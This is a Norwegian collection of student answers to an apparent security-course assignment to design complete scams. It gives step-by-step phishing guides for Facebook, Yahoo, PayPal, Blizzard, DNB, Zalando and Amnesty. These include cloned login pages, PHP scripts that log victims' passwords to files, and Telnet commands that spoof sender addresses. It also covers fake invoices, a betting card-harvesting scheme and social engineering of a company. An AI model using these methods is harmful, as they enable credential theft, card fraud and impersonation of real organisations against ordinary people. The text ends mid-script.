22 Jeg ville laga alt helt prikk likt på phishing-siden og videresendt inputen til den faktiske 'password reset' siden som Blizzard har, fordi man trenger ikke være logget inn for å være der (obviously). Nå vet jeg ikke om de har noe sikkerhet på hvor man sender HTTP requests fra, men i teorien så ville jeg bare logget brukernavn ogpassord og videresendt dem til den originale siden slik at passordet ville blitt oppdatert på ordentlig. Om jeg bare hadde gitt en feilmelding ville det kanskje blitt mistenksomt. Jeg ville prøvd å få kopiert CAPTCHAen fra den originale siden ved hjelp av hva enn verktøy jeg måtte trenge, for eksempel ta screenshot av regionen med Python og laste opp bildet selv. Da vil brukeren løse CAPTCHAen for meg og sende denne videre som jeg da først sjekker er riktig input for å gå videre på den originale siden ved hjelp av HTTP requests i bakgrunnen. Om alt stemmer og man får gå videre vil jeg vise neste side hvor man bytter passord, lagre hva jeg får og videresende HTTP requesten til den originale siden sånn at responsen som blir gitt vil være den brukeren får se i slutten da passordet vil være oppdatert. Om dette funker skal jeg nå ha skaffet login info uten å bli lagt merke til. Burde også skaffe et ganske likt domene da kun de dummeste ikke sjekker URLer nå til dags. Det er den delen som kanskje ville vært vanskeligst. Sender også mailen 'fra' noreplyeu@blizzard.com, for om dem prøver å svare vil de bare få en /facepalm respons, noe som 'tvinger' dem til å gå på linken min. De kan ikke snakke med support in-game da de ikke kan logge inn heller. For en mer oversiktlig framgangsmåte: Brute force login, få kontoen sperret. Send . Brukeren åpner den falske 'password reset' siden. HTTP request skaffer CAPTCHA før lasting av siden ved hjelp av desktop-verktøy som Python/Java. Sessionen man får fra Blizzard lagres og legges inn i din egen fake side.

23 Brukeren skriver inn info, svarer CAPTCHA. Info og CAPTCHA valideres av Battle.net, funker det ikke gir vi feilmelding og lar dem skrive inn på ny, funker det så redirecter vi til 'nytt passord'-siden hvor man skriver inn nytt passord. Bruker fortsatt samme session som er gyldig på Battle.net. 8. Hva enn dem skriver her lagrer vi og redirecter dem til den originale siden ved å sende HTTP requesten i bakgrunnen for dem før vi redirecter, slik at de ender på gyldig måte i Battle.nets avslutningsside og har fått endret passord på vanlig måte. Siden vi validerer alt med Battle.net steg for steg så har det ingen ting å si om de prøver å lure scammen vår ved å skrive inn tull og tøys om dem selv som ikke er sant, for de vil ikke komme videre uansett om de ikke skriver inn gyldig CAPTCHA eller security input etc. Vi dobbeltsjekker dette med Battle.net før vi går videre, så alt vil se helt ekte ut. Jeg leste gjennom mailen og rettet opp skrivefeil, men lot det være så å si akkurat det samme slik at om dem dobbeltsjekker med originale mailer fra Blizzard som ser like ut så må de jo være det. Det er jo hele poenget, å la offeret stole på at dette bare er en vanlig rutinemelding som kommer på grunnlag av å beskytte kontoen deres. MEN. Om de sjekker e-posten sin på f. eks. skolen så vil de ikke ha tilgang til å åpne spillet og prøve å logge inn, mest sannsynlig. Et problem med denne scammen er jo at Blizzard vil sende ut sin egen helt prikk like mail om brukeren prøver å logge inn til en sperret konto. Man må nesten bare håpe på at de velger din i det tilfellet, kanskje ved å sende den på et senere tidspunkt enn da de prøvde å logge inn (kun i tilfeller hvor man kan overvåke offeret på noen måte og vite at de prøver å logge inn). Alle scams vil ha noen svakheter, spesielt om man prøver å lure ting fra folk som er på store nettsteder/spill hvor sikkerheten er høy. Mitt forslag ville nok ha fungert på en del om man klarer å time det riktig, dessuten er det 50% sjanse at de velger vår mail overfor den andre da det er ganske uskyldig å la dem tenke «Oi, de

24 sendte meg to mail. Ja, jeg prøvde jo å logge inn mer enn én gang, det er jo bare logisk!». Greia er jo den at om de faktisk endrer passord på vår side så blir det endret på ordentlig, så de vil ikke merke noe og da drite i den faktiske en fra Blizzard, for nå kommer de inn på kontoen. Så om de velger vår mail eller den andre vil de se så å si 100% like ut (utenom URLer etc.), så offeret ville hatt vanskelig fra å skille dem om de hadde mistanke i det hele tatt. Oppgaven hadde kanskje vært enklere om jeg valgte å scamme ti-åringer som spiller Runescape. «Du har blitt utesperret og vil bli bannet om du ikke logger inn NÅ!» - «Oh noes, jeg må SKYNDE MEG Å LOGGE INN!», men synes nesten det ville bli litt for lett og kjedelig, ville prøve noe mer utfordrende. NRK Innledning Uten å ha konkret statisikk å vise frem til, er det nærliggende å anta at de fleste norske husstander har en TV-mottaker som er i daglig bruk. NRK-lisensen, eller kringkastingsavgiften, har lenge vært et diskutert tema, med spørsmål som knytter seg til dens nødvendighet, og annen problematikk når vi nå blir mindre avhengig av den tradisjonelle TVn for å se et program. Grunnlaget for denne svindelen er å spille på offerets følelser, der vi som myndighet i større grad vil prøve å tilpasse oss offerets økonomi. Svindelen har en kombinasjon av phishing sider, spoofing og tradisjonell brevpost for å vinne offerets tillit. Denne typen svindel vil ta relativt lang tid fra den starter til svidelen er gjennomført, da vi må vente på noen spesielle datoer. Dette ville trolig også la seg gjennomføre på andre avgifter med stort omfang, som feks. årsavgiften på bil. Svindelen baserer seg på dokumentfalsk i fysisk form. Svindelen Man har på forhånd kjøpt et.info-domene eller et med lignende suffix for å være mest mulig troverdig. Et.no-domene hadde vært det ideelle, men et organisasjonsnr hadde da vært nødvendig for å registrere, og det er grunn til å tro at man har lettere for å bli avslørt. Jo mindre spor som leder tilbake til oss etter svindelen desto bedre er det. Man har i tillegg opprettet en konto i utlandet som skal brukes senere. Domenet kan feks. få navnet "lisensundersokelsen", "lisensutredning" eller "avgiftsundersokelsen", slik at det fulle domenenavnet eksempelvis blir:

25 Gode, gjennomtenkte domenenavn, "offisielle" suffix og filstinavn som inneholder "store" ord som "regjeringen" eller lignende kan styrke svindelens troverdighet. URLen skal ligge i klartekst og skal ikke være skjult bak noen HTML formatering. E-posten som inneholder linken, blir først sendt til tilfeldige adresser som står på en mailingliste. Ikke-norske mottakere, eller de uten TV vil forhåpentligvis ikke lese e-posten. Ordlyden på e-posten kan feks. se ut som dette:

26 Vi bruker bevisst setninger som "..tilpasse oss din økonomiske situasjon.", for å gi offeret et inntrykk av at vi er på vekommendes side og at vi vil hjelpe til. Vi legger også inn ord som får de politisk engasjerte til å reagere: "...forslag om å også kreve lisens på.. ". Samt enkeltord som "barn" for å trigge de mer primitive følelsene i offeret. Selve spørreundersøkelsen kunne feks. sett ut som dette: Vi henter navn og adresse som vi skal bruke senere i svindelen. Dette gjør vi uten å gi noe mer opplysninger om hvorfor. Alternativt kunne vi bare bedt om adresse deretter manuelt funnet navn på de som bor i husstanden via opplysningstjenester. Selve spørreundersøkelsen er kort, og har kanskje rundt 5 sider totalt. Dette kan kanskje opplyses en plass før undersøkelsen starter, slik at offeret vet at det ikke tar lang tid, og det er derfor større sjans for at vedkommende deltar.

27 I spørreundersøkelsen bruker vi også setninger som "Hva hadde passet best for deg?". Dette er som nevnt en viktig del i svindelen. I tillegg til eksemplene over, har vi kanskje noen lette, generelle spørsmål i mellom som går fort å svare på.vi har nå navn, adresse og vi vet når offeret ønsker å motta

28 lisensavgiften. Hvis offeret svarer at han synes at dagens løsning fungerer, får vedkommende et annet spørsmål 4. Uavhengig av hva offeret svarer på spørsmål 4 vil svindelen fortsatt fungere fordi vi har navn og adresse, og vi vet offeret har en TV. Hvis offeret svarer "Ja", har vi noen ekstra opplysninger som kan hjelpe oss. Siste del av svindelen går nå ut på å produsere troverdige faktura fra NRK. En person som er god på grafikk og typografi ville forholdsvis enkelt kunne produsert dette. Spesialpapir kan kjøpes hos forhandlere av kontorrekivisita. Vi kan nå sende faktura til offeret før den ekte faktura sendes fra NRK. Vi har navn og adresse, samt et generert lisensnummeret, i håp om at offeret ikke sjekker det opp mot tidligere faktura. Hvorfor det er en bra svindel Svindelen er troverdig, det brukes hele tiden dokumenter som ser ut som offisielle dokumenter. Vi lurer offeret inn i svidelen ved å spille på følelser. Offeret blir ikke bedt om å skrive inn personopplysninger eller annen form for sensitiv data. Det er trolig meget få som sjekker opp det genererte lisensnummeret mot tidligere faktura. Det er sjanse for at offeret vil gjenta innbetalinger hvis han i undersøkelsen ønsket det månedlig eller kvartalsvis. Det er mange muligheter for å skape forvirring og hale ut tid. Før eller etter ekte faktura kan man sende et brev å si at man skal se bort fra den. Man kan også ringe til offrene og forklare hva som har skjedd pr. Tlf. Facebook Dette er en bra teknikk, da de fleste facebookbrukere ikke ser på URL'n, men bare ser etter det stedet hvor de skal sette musepekeren og venstreklikke for å logge seg på. Spesielt hvis siden er klin lik den de forventer å bli servert. Tknikken med å klone en html-side er den raskeste og enkleste måten. Å lage siden fra skrætsj er fryktelig tungvint. Klone login-siden: -Høyreklikke på den aktuelle siden --> vis kildekode. -Kopier hele siden, og lag en ny fil 'index.html' -Gå til addressene for css-filene og kopiere de inn i samme mappe som index.html, og forandre path til din nye lokasjon for filene. -Forandre 'action'-attributtet for 'login_form' i vår 'index.html' til

29 ' hvor vi stjeler teksten fra offeret. Forandringene på siden nedenfor er gjort for å vise at man kan gjøre stort sett hva man vil med siden. PHP-phishingskript: kjøres når offer trykker "Bli lurt"-knapp, og sendes til vår addresse: ' Her lagrer vi pålogningen til 'passord.dat'. <?php $saving = $_REQUEST['login attempt']; if ($saving == 1){ $data = $_POST['" $file = "passord.dat"; $fp = fopen($file, "w") or die("couldn't open $file for writing!");

30 fwrite($fp, $data) or die("couldn't write values to file!"); fclose($fp); echo "Saved to $file successfully!"; }?> Her: ' plasserer vi vårt phpskript( vår klonede facebook loginside( og CSS-filene tatt fra den originale loginsiden. Phpzilla: er et gratis webhotell opp til en viss datamengde og hastighet, og vil fungere fint for vår lille svindel. Facebook Mailserver: records, finner navn på mailserver. I vårt tilfelle: smtpin.mx.facebook.com ) Mail: (mail via Telnet kan maskeres etter ønske) Denne mailen er basert på en ekte henvendelse fra Facebook ved bytte av passord. I terminal(ubuntu): Telnet smtpin.mx.facebook.com 25 HELO facebook.com MAIL FROM: password_change+p3m5k1d@facebookmail.comrcpt TO: karinordmann_62@yahoo.no DATA from: Facebook <password_change+p3m5k1d@facebookmail.com> to: Karin Ordmann <karinordmann_62@yahoo.no> reply-to: noreply subject: <html> <body> <p><img src="logo.png"><p><br> <p>hey Karin<p> <p>you recently changed your Facebook password on (byttes med aktuell dato "March 04, at 2:02pm").<br> As a security precaution, this notification has been sent to all addresses associated with your account.<p>

31 <p>if you did not change your password, your account may have been the victim of a phishing scam.<br> Please follow the link to regain control over your account:<br> <a href=" u= &n=w8hyabww</a><p><br> <p>thanks,<br>the Facebook Team<br><br><p> </body> </html>.. QUIT Når offeret har blitt frastjålet pålogningsinfo, sendes vedkommende videre til den ekte login-siden til Facebook, og vil mest sannsynligvis bare prøve en gang til, siden det ikke skjedde noe den første gangen... Amnesty Vi har laget en svindel som går ut på å få folk til å donere penger til «Amnesty Internatinal». Vi har laget en falsk epost om en veldedighetskonsert som folk kan se gratis, men har mulighet til å gi en liten gave i sammenheng med konserten. I mailen er det er link til en side som ser helt lik ut som Amnesty sin donasjonsside, men forskjellen er at pengene som blir donert går i vår lomme i stedet for Amnestys. Bilde av mailen vi ville sendt ut:

32 Her er en helt lik kopi som Amnesty sin side, men hvis man ser på linken er det vår egen «amnestyside». Vi ville typisk brukt et domene som «anmesty.no».

33 Tror denne svindelen vil fungere da Amnesty har veldig mange medlemmer og det er stor sjanse for at de har donert før og vil gjøre det igjen. Samtidig er det ingen press om betaling i mailen, noe som kanskje gjør det mer troverdig.

34 Zalando Vi har valgt å lage en falsk zalando side. Der kan vi kan ta imot bestillinger (dvs, de velger produkt, taster inn personlig info, kortinfo ol.), etter å ha fylt inn info, trykker de bestill, som vil sende de videre til den virkelige siden(vi har da sendt bestillingen til den virkelige zalando, og de vil komme rett til sikker betaling ). På dette tidspunktet har vi all personlig info, brukernavn/passord og kort info.

35 Som en annen del i vår scam, har vi valgt å sende ut falske ordrebekreftelser. Alle linker i mailen vil sende vedkommende til vår falske zalando side, der de for å ordne opp må enten logge seg inn med brukernavn og passord for å avbestille, eller sende inn notifikasjon med personlig info og/eller brukernavn og passord, for at vi skal ordne opp. Betting Scam Det er vanskelig å finne på noe som aldri har vært gjort før, så vi forsøker oss med en variant av et svindelopplegg som selger tips til kamper. Kampene vi selger tips til har som fellestrekk at det max er tre mulige utfall. Mål Målet vårt er tredelt. 1. For det første ønsker vi å samle inn data om så mange kredittkort som mulig. Denne informasjonen ønsker vi å selge videre. 2. For det andre ønsker vi å samle inn så mange e-postadresser i kombinasjon med passord, som mulig. Også denne informasjonen ønsker vi å selge videre. 3. Sist men ikke minst ønsker vi å lovlig (dvs med korteiers aksept) kunne belaste så mange kredittkort som mulig, for så mye som mulig. Forarbeide Vi oppretter en nettside for firmaet vårt. Siden har proft utseende, er på engelsk og har et godt

36 språk. Formålet med siden er å: Gi inntrykk av at vi er seriøse Etablere at vi har holdt på en stund Vise at vi har gode resultater Forklare hvorfor vi har gode tips Gi en overbevisende forklaring på hvorfor vi selger tips heller enn å bare bette selv. Ha mekanismer for registrering og kjøp av våre tjenester. Vi forøker å oppnå dette slik: 1: Spredd ut over siden vil du finne bannere med linker til kjente, seriøse, bettingselskaper. Du vil også finne oppdaterte resultatlister innen flere idretter. Dette henter vi greit vha RSS. Vi håper med dette å «låne» seriøsitet via assosiasjonen til bettingselskapene, samt å tilby en resultattjeneste som i seg selv kan oppleves som nyttig. Nederst på hver side vil det vises at det er X antall innloggede og Y antall gjester på siden. Disse tallene fakes for å gi skinn av at det stadig er mange besøkende, og særlig innloggede besøkende, på siden. 2: En egen seksjon tar for seg forrige års (fabrikkerte) tips, sammenstilt med faktisk resultat og kjente bettingselskapers odds på våre tips.. Ikke alle tipsene vil ha slått til, men de som feilet vil gjerne ha som fellesnevner at kampen plutselig snudde mot slutten. Å sette sammen denne oversikten vil være noe tidkrevende, men det er et poeng at oversikten ikke trenger å gjelde veldig mange kamper (se pkt 4, under). 3: Knyttet til forrige års tips og resultater har vi en statistikk-del, som viser hvor treffsikre vi har vært, og hvor stor prosentvis fortjeneste man ville hatt dersom man spilte på samtlige tips det året. 4: Det er viktig å kunne sannsynliggjøre hvorfor tipsene våre er gode. Vi skriver om dette både påsikkerhet og hacking - Prosjekt 3 Torbjørn Jørgensen Jon Are Wisting Geir Skoglund en egen side, og som et svar i en FAQ begge deler enkelt tilgjengelig fra hovedmenyen. Forklaringen vår er at vi har en nettverk av sentrale kilder i flere klubber og miljøer. Disse kildene gir oss nøkkelinformasjon om skader, sykdom formutvikling, treningsresultater, konflikter osv. Når to motstandere vi har slik innsideinformasjon om skal møtes i en kamp, kan vi ved hjelp av kraftige datamaskiner og hemmelige algoritmer beregne odds for den kampen. Dette sammenlignes igjen

37 med oddsene fra bettingselskaper, og først i de tilfellene våre odds er klart bedre enn enn bettingselskapene, går vi ut med et tips. Det er denne tre-stegs-modellen (Information Computing - Comparison) som sikrer at vi går i pluss over tid. Vi er ikke allvitende, vi bare vet mest. 5: Også her har vi en egen side + en del i FAQen, for å forklare det mest åpenbare spørsmålet: Vi er åpenbart inne i dette gamet for å tjene penger. Så hvorfor better vi ikke bare selv? Svaret er enkelt: Vi må beskytte kildene våre. Kostnaden ved å holde apparatet vårt i gang er såpass store at vi ville vært nødt til å bette stort for å ha fortjeneste. Dersom vi stadig bettet, og vant, store beløp, ville vi eksponert oss selv og dermed også kildene våre. Løsningen er derfor å spre bettingen ved å la kundene våre stå for den, slik at vi kan jobbe i det stille med å skaffe best mulig informasjon. Dette sikrer oss inntekter, samtidig som kildene våre vet at de er beskyttet. 6: For å bli kunde hos oss må man registrere seg med brukernavn (e-postadresse) og passord. Man får da en egen profil/medlemsside, hvor man kan legge inn betalingsinformasjon og få tilgang til tips. Det er mulig å abonnere på flere pakker f eks boksing, norsk fotball, engelsk fotball, etc. Pakkene selges også som abonnement på måneds- eller årsbasis. Når pakker kjøpes blir kundens kort belastet for avtalt beløp. Alle abonnement er løpende, og må sies opp for å opphøre. Gulroten i pakkesystemet er at man vha en verdikode kan få tips gratis. Forutsetningen er at man registrerer kredittkortinformasjon, slik at vi kan verifisere at det er snakk om en ny bruker. Dette skal forhindre at samme bruker oppretter stadig nye kontoer. Denne gulroten er sentral i resten av scammen. Angrepet Vi kjøper et stort antall mailadresser. I forbindelse med et stort arrangement, f eks boksing eller OL sender vi ut informasjon om tjenesten vår, med link til nettsiden. Mailen inneholder en verdikode og informasjon om at koden gir 3 gratis tips innenfor dette arrangementet. De kundene som registrerer seg vil motta tips på medlemssidene sine. Tipsene vil gjelde kamper med kun 2 mulige utfall. På forhånd sjekkes det ut hvilke kamper som gir best odds (altså kamper hvor det regnes som ganske sikkert hvem som vinner). 2 av tipsene vil gjelde slike kamper. Det siste vil gjelde en kamp med ca 50/50-sjanse. Med mindre vi har veldig uflaks vil vi etter tre kamper oppnå at 50% av kundene har fått 3 riktige tips og 50% har fått 2 riktige. De kundene som fikk 2 riktige, vil få en oppfølgingsmail med beskjed om at de er tildelt ett tips til, siden vi ikke fikk full pott forrige gang. Dette vil også være en 50/50sjanse. Sannsynligvis vil derfor angrepet vårt innebære at 75% av kundene har fått tre riktige tips. De resterende 25% gjør vi ikke mer med, men nøyer oss med informasjonen vi allerede har sanket fra de. For de 75% med tre riktige gjelder: Dersom disse ikke går videre og kjøper en pakke, følges de

38 opp med en mail etter en tid f eks i forbindelse med et nytt arrangement. Mailen minner de på hvilke tjenester vi tilbyr, og at vi viste dyktigheten vår forrige gang. Hvis vi ikke får respons på denne sendes det en siste mail. Her opplyser vi at vi er i ferd med å avslutte inaktive kontoer altså kontoer uten abonnement, og at kontoen deres vil bli slettet. (Hvis du ønsker å avslutte kundeforholdet trenger du ikke foreta deg noe.)sikkerhet og hacking - Prosjekt 3 Torbjørn Jørgensen Jon Are Wisting Geir Skoglund Alle tips som presenteres etter at kunden har kjøpt en pakke, vil være tips hvor oddsene i utgangspunktet er slik at vi med stor sannsynlighet vil gi riktig resultat. Vi leverer altså tips som lovet, selv om de er ganske verdiløse. Dette fortsetter så lenge kunden abonnerer. Denne delen er viktig, siden den innebærer at vi overholder vår del av avtalen og vanskelig kan anklages formelt for noe lovbrudd der. Først når kunden er melket tom og sier opp abonnementet sitt selges informasjonen videre. Hvorfor tror vi dette vil fungere? Det er et element av de store talls lov i dette. Selv om bare 5% av mailene resulterer i at noen registrerer seg vil det dreie seg om mange mennesker f eks 2500 av mailer. Hvis halvparten av disse igjen kjøper tjenester for $100 har vi en fortjeneste på $ Og det er ingen grunn til å stanse på mailer. Det er vanskelig å si noe om hvor mange som vil bite på, men vi tror at mange nok vil la seg blende av at det virker som om vi leverer hva vi lover, til at en svindel som dette kunne fungert. Aker Solutions Fremgangsmåte a) Søke Internet etter interessant informasjon, bl.a.; b) Observere i lokalene og se på organisasjonskart for å finne personer som kan utsettes for social engineering. Her vil det være viktig å kunne få opplysninger som kan brukes til å få informasjon om innstillinger og tilganger på serverne, etc.. c) Se på ledige stillinger i Aker Solutions. Ringe og stille spørsmål i forbindelse med stillingene og legge inn spørsmål som gir mer informasjon om it-løsninger, innstillinger, tilganger på serverne, etc. som vi er ute etter for å kunne få tak i sensitiv informasjon. Her vil selvfølgelig et grundig forarbeid være nødvendig for å kunne få de som vi snakker med til å utlevere den ønskede informasjonen. Her kan vi faktisk gå ganske langt, fordi det er naturlig å vise interesse for stillingene og omfanget av det "en eventuelt skal jobbe med".

39 d) Besøke Aker Solutions i ulike henseender der vi observere og kontakter ansatte for å få ut mest mulig informasjon, bit for bit som vi senere kan sette sammen.e) Kontakte Aker Solutions som "student" og få informasjon som kan benyttes videre til å få tak i mer sensitiv informasjon. Her kan vi få innpass hos Aker Solutions og bl.a. få masse informasjon hos de som jobber med Service desk (Help desk). Om vi er fysisk tilstede, kan vi komme godt overens med de som jobber på Service desken og "hjelpe" dem med alt mulig. Hjelpsomme og lærevillige studenter blir neppe mistenkt som "informanter" til å fa tak i tilganger til sensitiv informasjon. Her kan vi også komme godt overens med "veileder\kontaktperson" som garantert vil gi oss masse informasjon. f) Kontakte Aker Solutions som "hjelpeorganisasjon" for å få gammelt datautstyr som vi så kan benytte ulike metoder for å finne "gjenglemt" informasjon på harddisken.

40 YahooDel 1 Oppgavebeskrivelse Lag en komplett svindel der du benytter teknikker som spoofing, phishing sider osv. Tenk også på ordlyd i tekst osv. Ikke bare teknologien... Om dere ikke kommer på en bedre idee, kan målet være å lure brukernavn og passord fra en utvalgte gruppe brukere, uten å bli oppdaget. Oppgaven skal leveres i PDF, der dere i tilegg til å beskrive selve svindelen, også beskriver hvorfor dere mener at fremgangsmåten dere har valgt er den beste. NB! Dere skal kun lage svindelen, ikke teste den ut Lag en svindel 1. Step: Først åpne nettstedet i en nettleser som Mozilla Firefox eller annet nettleser som du ønsker å opprette en phishing side. Nå høyreklikk på en tom plass og velg vis kilde, kopiere alt innholdet til en notatblokk og lagre et eller annet.html som yahoo.html. 2. Step: Nå åpen Yahoo.html i en notisblokk. Nå søke etter strengen "action = https.." og endre adressen til login.php og endre metode = "Post" til "GET" Endelig kan man lagre det.

41 3. Step: Nå må vi lage login.php. For denne åpne notepad, kopiere / lim inn følgende kode i den og lagre det som login.php. Med standard som offeret vil bli omdirigert til yahoo.com gang til gang han klikker login, hvis vi vil kan vi endre adressen, kan du gjøre det ved å endre til for eksempel <?php header ('Location: $handle = fopen("log.txt", "a"); foreach($_get as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit;?> 4. Step: Det fins noe web hosting nettsteder som er gratis å opprette en konto, ved å søke på nettet. I google fant jeg en gratis nettsted som er gratis som vi kan opprette en konto og har kommet til et godt steg til å svindle andre.

42 5. Step: Nå laste opp alle de to filene som vi opprettet Yahoo.html, login.php. 6. Step: Nå sende Yahoo.html link til offeret, når han trykker på yahoo.html informasjon og pålogginger på, vil han bli omdirigert til nettstedet som vi gjorde i tidligere i trinn Step: Nå for å se ofrene passord pålogging til din hosting konto, det vil du se ny fil log.txt, åpne den for å se ofrene bruker-id og passord

43 Facebook I denne oppgaven valgte jeg å lage en phisingside til facebook så man får brukernan og passord til de som prøver å logge inn. Måten dette gjøres på er å bruke to phpfiler. En som utgir seg for å være innloggingssiden til facebook og en man bruker til å lagre brukernavn og passord. Dette skrives da videre til en fil som ligger på servern. Scriptet er ikke skrevet selv, men funnet på en annen side. Indexsiden: Filen som logger innlogginga: Innloggingen blir skrevet til filen «p1s2s3.dat», og dette kan vi da lese i klartekst seinere. For å gjøre hele scammen litt mer troverdig må man ha en url som kan se troverdig ut. Dette kan man få fra flere steder. Evt kan man bruke en lang adresse hvor det står fb noe sted og linke til et «bilde». Disse adressene er ofte lange og krunglete og folk trykket som oftest sålenge de ser enten face, fb eller book i adressa. Man kan også sende mail til venner og bekjente som ligner på mails som facebook selv sender ut, bare at vi linker til vår side. Da kommer de til innloggingssiden, og de blir automatisk sendt til den ekte facebooksiden. Så er det bare å sette igang og lure venner :)

44 PayPal Vi har laget en phishing-nettside, identisk med den norske versjonen av PayPal. Når offeret skriver inn sin e-post og passord, blir disse opplysningene lagret i en fil hos oss, mens offeret blir videresendt til den ekte PayPal-nettsiden. Phishing-nettsiden vår er en kopi av kildekoden til den ekte PayPal-nettsiden, den eneste endringen vi har gjort er hvor e-posten og passordet skal sendes. E-posten og passordet sendes til et lite PHPscript som lagrer offerets e-post og passord, før offeret sendes videre til den ekte siden. For å lure offeret inn på vår nettside, har vi valgt å sende falske e-post fra PayPal ved hjelp av Telnet. Vi mener at dette er den beste metoden fordi den er enkel og den kan virke troverdig for de som ikke er altfor mistenksomme på linker de får i e-post. I tillegg så vil ikke offeret merke at passordet har blitt lagret, fordi offeret blir sendt til riktig nettside.

45 Endringene i kildekoden: <form method="post" action="steal.php" name="login_form" class=" formsmall login"> PHP-scriptet: <?php $pass = $_POST["login_password"]; $ = $_POST["login_ "]; $fil = fopen("c:\\temp\\passord.txt","a"); fwrite($fil, $ . " \t". $pass. "\n"); fclose($fil); header('location: Eksempel på Telnet-e-post: HELO e.paypal.no MAIL FROM: paypal@e.paypal.no RCPT TO: offer@epost.no DATA from: "PayPal" <paypal@e.paypal.no> to: "offer" <offer@epost.com>

46 reply-to: subject: Ditt passord er blitt stjålet MIME-Version: 1.0 Content-type: text/html; charset=iso Content-transfer-encoding: quoted-printable <html> <a href=" denne linken for å logge inn på PayPal, for å endre passord. </html>. QUIT Commando & Conquer Gratulerer! Du har fått en invitasjon til å teste ut Commando & Conquer. Logg deg inn for å hente installasjons pakken. Mvh EA games Denne svindelen går ut på i lure fram brukernavn og passord hos personer som er interessert i dette spillet. Grunnen til at jeg bruker denne metoden er fordi spillet kommer snart til beta-testing, og at det er en del Commando & Conquer fans som er desperate/villig til å teste det ut. Sender man denne mailen til nok folk, vil vi få noen som går på denne. Brother Jeg har leget en «scam» for å hacke passordet til broren min, ved kun å bruke info jeg ville ellers finne på nettet. Ganske simpelt scam, ikke sikker han hadde gått på det, men han er en godhjerta tulling så han hadde nok det. Steg 1: Lag en mailaddresse. Det jeg ønsker å gjøre er å utgi meg for å være en jente på skolen hvor broren min går. Så velger noe som linenilsen94@gmail dot com (viktig at det er en jente). Bruker 94 bak siden det

47 er da broren min ble født. Velger gmail, siden ordet «hotmail» er mindre sansynlig at jeg trykker på av en eller annen grunn. Steg 2: Skrive mailen. Mailen går som så: Subject: Spørreundersøkelse Glemmen vgs. Hei. Jeg representerer en gruppe so går studiespesialiserende på Glemmen vgs. Vi fikk som norskoppgave å lage en spørreundersøkelse for ett prosjekt. Kunne du tatt et minutt å svart på den for oss? -link, spessifisert i Steg 3Steg 3. Lag en spørreundersøkelse. Så dette steget er hvor scamen min vil mest sansynlig feile. Det jeg tenkte var; siden jeg vil finne hotmail passordet til broren min, går jeg inn å ser hvilke spørsmål som vil bli stilt når man ønsker å få tilbake passordet i tilfelle man har glemt det etc. Jeg tar da de spørsmålene og legger inn i en online survey, bruker en kjent gratis side. Så hvis han da svarer på alle spørsmålene og det han svarer er riktig i følge hotmail spørsmålet, vil jeg lett få tilgang til hotmailkontoen hans. Det var det. En enkel og kanskje effektiv scam. Jeg kunne sikkert utvida dette til å bli sendt til hele skolen, hvis jeg fant en liste over alle skol ene. Det Skandinaviske Militære Sammarbeid vår scam vil være basert på å sende fake sesjons brev til ungdommer i riktig alder. Vi vil sende ut brev der vi utgir oss selv for å være sesjonsavdelingen hos det norske forsvaret. Her vil vi også forklare at sesjonssystemet er i en prøveperiode der de nordiske landene har slått seg sammen. Defor så vil vi gjerne at offeret skal registrere seg på det nordiske sammarbeidsnettstedet Det Skandinaviske Militære Sammarbeid (DSMS.nu). De vil få en kode som vil identifisere dem; denne må de bruke for å registrere seg med mail og passord. Det er viktig at posten sendes ut før forsvarets reele innkalling sendes. Innen den tid vil ofrene fått mulighet til å registrere seg i et sosialt nettverk, som blir generert på samme måte som militæret genererte sitt for noen år siden. Her vil vi da

48 samle inn personalia, samt passord igjen. Formålet med dette er å samle inn, personnummer, via å simpelt nok be offrene skrive inn personnumm er som en nødvendig opplysning for registrering, brukernavn, passord og andre opplysninger disse personene forhåpentlig ofte vil bruke på andre nettverk eller for eventuelle nettverkssystmer(som epost) de kanskje bruker i forsvaret. Vi vil kunne utgi oss for å være offeret for å få tilgang til hva en slags informasjon vi kan få tak i. Vi mener denne svindelen er en veldig funksjonell og kan fungere godt. Dette er fordi ungdommene som får disse brevene er klare over at de vil få brev angående sesjon, dessuten tenker mange i den generasjonen at de er såppas mye på nett og ikke kan bli lurt. De er heller ikke vant til analog manipulering. Men det er i største grad det autoritære bak et brev fra millitæret som vil være det overbevisende. Vi ble nødt å bruke.nu domenet, fordi.no er kun for bedrifter, og fordi det kan bli tracet, noe vi absolutt ikke vil oppleve. Dessuten er.nu et veldig populært domene for skandinaviske sider, noe vi vil fremstå som å være. Statoil Vår spoof: Greetings of the day to you, although you may be skeptical receiving this as we have not met before, I am Mr. Svindel Svindlersen C.E.O of Statoil, Norway. Nevertheless I have a business proposition involving the sum of $26,000, usd in my bank which I know we will be of mutual benefit to both of us, and I believe we can handle it together, once we have a common understanding and mutual cooperation in the execution of the modalities. I shall furnish you with more information about this operation when i receive your reply. Should you be interested, please send me those information. 1.Full name 2.Age 3.Social security number

49 3.Occupation, 4.Private phone number, 5.Current residential address Via this Your earliest response to this mail will be highly appreciated. Regards, Mr. Svindel Svindlersen Vi får svar og sender mail tibake: Thank you for your response, Mr. Lettlurt Lettlurtsen. You have made a smart choice by joining me in my business proposition. I now have all the information i need on you, all that is left for you to do now is invest a sum of usd as a sign of good faith on your behalf. I find this to be a reasonable price for you to become my business partner. Pleace use this account number for you transmission of usd: Look forward to working with you Mr. Lettlurt Lettlurtsen. If you have any questions, dont be afraid to ask. Regards, Mr. Svindel Svindlersen DNB I vårt svindelforsøk skal vi benytte oss av epost spoofing med link til et phising nettsted. Vi skal utgi oss for å være bankselskapet DNB (Den Norske Bank). Eposten til potensiell kunde er hentet via Facebook, for å sikre at mottakers adresse er en reel epostkonto. I eposten gir vi uttrykk for at offerets bankkonto blir misbrukt og forsøkt svindlet. Offeret må klikke på en vedlagt link som hendsviser offeret til et nettsted identisk til DNB.no. Offeret vil tro at han/hun har blitt hendvist til bankselskapets nettsted som vil øke troverdigheten. Offeret bes fylle ut sensitiv informasjon som navn, fødselsdato, kontonummer og passord for å få offeret til å tro at han/hun blir identifisert gjennom denne informasjonen slik at DNB kan stoppe svindelforsøket. Etter at offeret har fylt ut informasjonen må han/hun klikke på en knapp for å gjennomføre. Det som nå vil skje er at informasjonen blir slagret i tekstfilen passordplx.txt, slik at vi får alle de opplysningene offeret har fylt ut. For å få lagret informasjonen, inkluderer vi følgende kode i login siden.<?php

